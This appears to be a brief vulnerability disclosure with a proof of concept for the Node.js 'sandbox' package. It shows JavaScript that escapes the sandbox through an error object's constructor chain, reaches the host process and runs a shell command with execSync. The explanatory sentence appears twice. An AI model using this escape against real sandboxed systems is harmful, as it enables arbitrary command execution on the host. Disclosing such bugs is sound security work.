var Sandbox = require("sandbox")
var code = `
try{
toLocaleString()
} catch(pp){
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
`
s = new Sandbox()
s.run(code)
We found a sandbox escaping bug. This bug can be triggered by calling toLocaleString() function.
Also, we can execute arbitrary shell code using the process module.
We found a sandbox escaping bug. This bug can be triggered by calling toLocaleString() function. Also, we can execute arbitrary shell code using the process module.